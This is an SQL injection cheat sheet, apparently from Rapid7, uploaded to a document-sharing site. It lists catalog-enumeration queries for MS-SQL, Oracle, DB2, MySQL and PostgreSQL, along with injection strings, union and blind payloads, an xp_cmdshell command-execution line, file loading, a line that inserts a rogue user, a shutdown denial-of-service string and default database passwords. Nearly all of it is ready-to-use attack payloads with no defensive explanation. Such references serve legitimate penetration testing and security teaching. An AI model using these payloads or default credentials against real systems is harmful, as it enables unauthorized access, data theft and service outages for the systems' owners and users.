SQL Injection Cheat Sheet: Common Commands and Techniques, Cheat Sheet of Programming Languages

Common SQL Injection Commands for Backend Databases

Typology: Cheat Sheet

2019/2020

Uploaded on 10/09/2020

anshula
SQL INJECTION CHEAT SHEET

Common SQL Injection Commands for Backend Databases

MS-SQL
Grab version: @@version
Users: name FROM master..syslogins
Tables: name FROM master..sysobjects WHERE xtype = 'U'
Database: name FROM master..sysdatabases;
Columns: name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<TABLENAME>')
Running User: DB_NAME()

Oracle
Grab version: table v$version compare with 'Oracle%'
Users: * from dba_users
Tables: table_name from all_tables
Database: distinct owner from all_tables
Columns: column_name from all_tab_columns where table_name='<TABLENAME>'
Running User: user from dual

IBM DB2
Grab version: Versionnumber from sysibm.sysversions;
Users: user from sysibm.sysdummy1
Tables: name from sysibm.systables
Database: schemaname from syscat.schemata
Columns: name, tbname, coltype from sysibm.syscolumns
Running User: user from sysibm.sysdummy1

MySQL
Grab version: @@version
Users: * from mysql.user
Tables: table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Database: distinct(db) FROM mysql.db
Columns: table_schema, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_name = '<TABLENAME>'
Running User: user()

PostgreSQL
Grab version: version()
Users: * from pg_user
Database: datname FROM pg_database
Running User: user;

SQL Injection Discovery

Common SQL Injection Attack Strings
Query syntax breaking: Single Quote ('), Double Quote (")
Injection SQL comment: Hyphens (--), Hash (#), Comment (/*)
Extending/Appending queries: Semicolon (;)
Injecting/Bypassing filters: CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL

Common SQL Injection Commands
Injecting Union: Union all select NULL (Multiple columns)
Running Command: 1;exec master..xp_cmdshell 'dir'>C:\inetpub\wwwroot\dir.txt' OR master.dbo.xp_cmdshell
Loading Files: LOAD_FILE(), User UTL_FILE and utfReadfileAsTable
Adding user: 1'; insert into users values('nto','nto123')
DoS: 1';shutdown --
Fetching Fields: select name from syscolumns where id =(select id FROM sysobjects where name = 'target table name') -- (Union can help)

Common Blind SQL Injection Commands
Quick Check: AND 1=1, AND 1=0
User Check: 1+AND+USER_NAME()='dbo'
Injecting Wait: 1;waitfor+delay+'0:0:10'
Check for sa: SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
Looping/Sleep: BENCHMARK(TIMES, TASK), pg_sleep(10)

Default Usernames/Passwords
Oracle: scott/tiger, dbsnmp/dbsnmp
MySQL: mysql/<BLANK>, root/<BLANK>
PostgreSQL: postgres/<BLANK>
MS-SQL: sa/<BLANK>
DB2: db2admin/db2admin

www.rapid7.com
